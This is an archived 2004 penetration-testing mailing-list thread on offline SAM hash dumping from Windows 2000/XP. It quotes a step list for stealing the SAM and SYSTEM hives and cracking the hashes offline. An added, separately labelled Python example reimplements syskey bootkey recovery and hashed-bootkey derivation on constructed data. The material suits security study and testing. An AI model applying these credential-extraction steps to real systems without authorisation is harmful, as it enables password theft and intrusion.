Re: Offline sam dump?

From: Kenzo (kenzo_chin@hotmail.com)
Date: Fri Jan 30 2004 - 10:18:39 EST


Have you tried booting from a regular DOS boot disk, then using DOS NTFS, then
copying the SAM file to a floppy? This should work on Win2k and WinXP.

----- Original Message -----
From: "Nicola Cuomo" <ncuomo@studenti.unina.it>
To: "Mark Melonson" <markmelonson@hotmail.com>
Cc: <pen-test@securityfocus.com>
Sent: Thursday, January 29, 2004 6:43 AM
Subject: Re: Offline sam dump?

> Hi, since the machines you are pen-testing are Win2k and WinXP boxes you
> cannot use SAMDUMP to dump the SAM (since syskey is enabled); however,
> look here:
>
> http://studenti.unina.it/~ncuomo/syskey/
>
> there is a tool to dump the password hash from the SAM database when
> syskey is enabled.
>
> I've never tested it on WinXP but I think it should work (sources are
> also available so you can modify/fix it).
>
> There is also a document that describes how it works and how to use the
> tool:
>
> ----from syskey.txt---
> 0) Boot using another OS (maybe Linux or DOS)
> 1) Steal the SAM and SYSTEM hive (from %WINDIR%\System32\config)
> 2) Recover the syskey bootkey from the SYSTEM hive using Bkhive (or
> Bkreg on pre Sp4 system)
> 3) Dump the password hashes using SAMDUMP2
> 4) Crack them offline using your favorite cracking tool
> ---------------------
>
> Hope this helps.
>
> Bye, bye
> --
> Nicola mailto:ncuomo@studenti.unina.it

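The procedure quoted above (steal SYSTEM and SAM, recover the bootkey with Bkhive, decrypt the hashes with SAMDUMP2) is what the following added example walks through in code. It is not part of the original thread or of Nicola's tools; it reimplements the first two stages as they are documented for the Windows 2000/XP/2003-era SAM layout (the same stages bkhive and samdump2 perform): assembling the syskey bootkey from the class names of the JD, Skew1, GBG and Data subkeys under Control\Lsa in the SYSTEM hive, and deriving the "hashed bootkey" from the SAM\Domains\Account F value. Registry parsing is out of scope, so the hive data is a constructed stand-in (a dict of class names and a constructed 0xa0-byte F value); the final per-user step, which additionally needs RC4 with a RID-derived key and a DES decryption, is described in comments but not implemented here.

```python
import hashlib

# Windows stores the 16-byte syskey split across the class names of these
# four subkeys under SYSTEM\ControlSetNNN\Control\Lsa (8 hex chars each),
# then applies a fixed byte permutation. bkhive undoes exactly this.
LSA_SUBKEYS = ("JD", "Skew1", "GBG", "Data")
BOOTKEY_PERMUTATION = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
                       0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]

# Fixed strings mixed into the MD5 that yields the RC4 key for the
# hashed bootkey (SAM\Domains\Account, value F, pre-Windows-10 format).
AQWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
ANUM = b"0123456789012345678901234567890123456789\0"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same op."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def bootkey_from_class_names(class_names: dict) -> bytes:
    """Stage 1 (what Bkhive does): rebuild the syskey bootkey.

    class_names maps each LSA subkey name to its class name, the 8-hex-char
    string a hive parser would read (here supplied as a constructed dict).
    """
    scrambled = b"".join(bytes.fromhex(class_names[k]) for k in LSA_SUBKEYS)
    if len(scrambled) != 16:
        raise ValueError("expected 16 bytes of scrambled bootkey material")
    return bytes(scrambled[BOOTKEY_PERMUTATION[i]] for i in range(16))


def hashed_bootkey(f_value: bytes, bootkey: bytes) -> bytes:
    """Stage 2 (first thing SAMDUMP2 does): derive the 32-byte hashed bootkey.

    f_value is the raw F value of SAM\\Domains\\Account. Bytes 0x70..0x80 are
    the salt, bytes 0x80..0xa0 the RC4-encrypted hashed bootkey. The first 16
    bytes of the result are later mixed with each user's RID and the string
    "NTPASSWORD\\0" to RC4-decrypt that user's NT hash, which is then
    DES-decrypted with two keys derived from the RID (not shown here).
    """
    if len(f_value) < 0xa0:
        raise ValueError("F value too short")
    rc4_key = hashlib.md5(f_value[0x70:0x80] + AQWERTY + bootkey + ANUM).digest()
    return rc4(rc4_key, f_value[0x80:0xa0])


# Constructed sample data standing in for parsed hives (not real key material).
SAMPLE_CLASS_NAMES = {"JD": "00112233", "Skew1": "44556677",
                      "GBG": "8899aabb", "Data": "ccddeeff"}
SAMPLE_F_VALUE = bytes(range(0xa0))


def demo() -> dict:
    bk = bootkey_from_class_names(SAMPLE_CLASS_NAMES)
    hbk = hashed_bootkey(SAMPLE_F_VALUE, bk)
    return {"bootkey": bk.hex(), "hashed_bootkey": hbk.hex()}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The permutation is the only real "secret" in stage 1: anyone with read access to the offline SYSTEM hive gets the bootkey, which is why the thread treats syskey as an obstacle to SAMDUMP rather than as protection. Real hives need a registry parser to reach the Lsa subkeys (via Select\Current to pick the right ControlSet) and the F value; newer Windows releases moved to an AES-based scheme that this derivation does not cover.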

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:47 EDT